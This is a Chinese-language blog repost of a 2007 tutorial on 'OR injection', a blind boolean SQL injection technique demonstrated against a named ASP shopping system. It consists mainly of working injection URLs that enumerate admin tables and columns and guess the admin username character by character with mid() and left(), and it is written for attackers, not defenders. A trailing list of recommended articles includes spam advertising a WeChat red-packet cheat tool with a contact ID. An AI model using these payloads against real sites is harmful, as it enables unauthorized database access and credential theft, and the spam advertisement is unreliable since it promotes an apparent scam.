假是真时真是假——or注入教程

原创 2007年09月13日 04:37:00
来源:邪恶八进制信息安全团队(www.eviloctal.com)

注意:文章首发脚本安全小组论坛(www.Cnsst.Org),后由原创作者友情提交到邪恶八进制信息安全团队,转载请注明首发站点。

PS:很久的文章了,07年4月的,最近找到修改了下就发上来,文章有些乱,请大家不要见怪

  记得一年前火狐有一位朋友问,如果一个站过滤了and和“'”的话,改怎么注入啊?当时我随口说了句“or注入”,后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。
  我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的“假是真时真是假”,比lake2大哥哥的IP欺骗更经典哦,呵呵。
  我们来构造测试语句:
Copy code

    vpro.asp?id=1 or exists(select * from admin)

返回错误页面,说明存在admin表我们来换一个表试试!
  
Copy code

    vpro.asp?id=1 or exists(select * from n0h4ck)

说明不存在n0h4ck这个表。
    我们继续来,构造语句
Copy code

    vpro.asp?id=1 or exists(select admin from admin)

返回or 1=1的页面,说明admin表存在admin字段。
  
Copy code

    vpro.asp?id=1 or exists(select padd from admin)

返回or 1=2的页面,说明admin表不存在padd字段。
  我们现在开始猜测数据了,
Copy code

    vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'

返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是“n”。
    我们再来
Copy code

    vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'

返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是“a”,我们第一个会想到什么呢?当然是“admin”啦。
    我们用left函数确定一下,
Copy code

    vpro.asp?id=1 or (select left(admin,5) from admin)='admin'

猜测正确,的确是admin,好了,后面的话就不用我说了吧!
版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

UC称腾讯操纵调研公司是真是假?

昨天,看到了乔布斯的书,也看到了UC的书。前者是一个天才的成长史,后者是一个选手的控诉史。苹果之所以伟大,是因为创新,而不是创伤。哪怕在低谷的时候,高昂头颅的乔布斯也会跟比尔盖茨握手,但是俞永福显然还...

红包控制尾数是真是假

红包控制尾数是真是假【微/信:app36678】微信红包尾数控制,设置尾数,尾数控制器软件辅助。 可以装挂 加 微信 -----> app36678                ...

[ASP.net教程] 新浪OAuth网站登陆连接,请求access_token时遇到21323 miss client id or secret 的解决方案

ios 借鉴下: 本文的环境仅仅是针对最新的新浪oauth2.0, 早期的1.0方式我不太了解,也不在本文的范畴内。 解决方案给出两种: 1,描述解决思路,各位自己去实现。  2,给出我开发好...

SPSS——OR值与RR值

  • 2014-04-04 16:24
  • 130KB
  • 下载

逻辑——真与假的世界

逻辑——消除歧义的工具      我们平时说话所用的语言被称为自然语言。自然语言的缺点就是容易引起歧义。这就体现出了逻辑语言的重要性。举以下一个例子: 技术员:这个水坝系统设计思路为按下紧...

【OpenCV入门教程之二】 一览众山小:OpenCV 2.4.8 or OpenCV 2.4.9组件结构全解析

本系列文章由zhmxy555(毛星云)编写,转载请注明出处。   文章链接: http://blog.csdn.net/poem_qianmo/article/details/19925819 ...

OR cad电子教程

  • 2015-09-29 13:49
  • 6.73MB
  • 下载

8086or8088指令教程

  • 2014-09-14 16:55
  • 2.76MB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)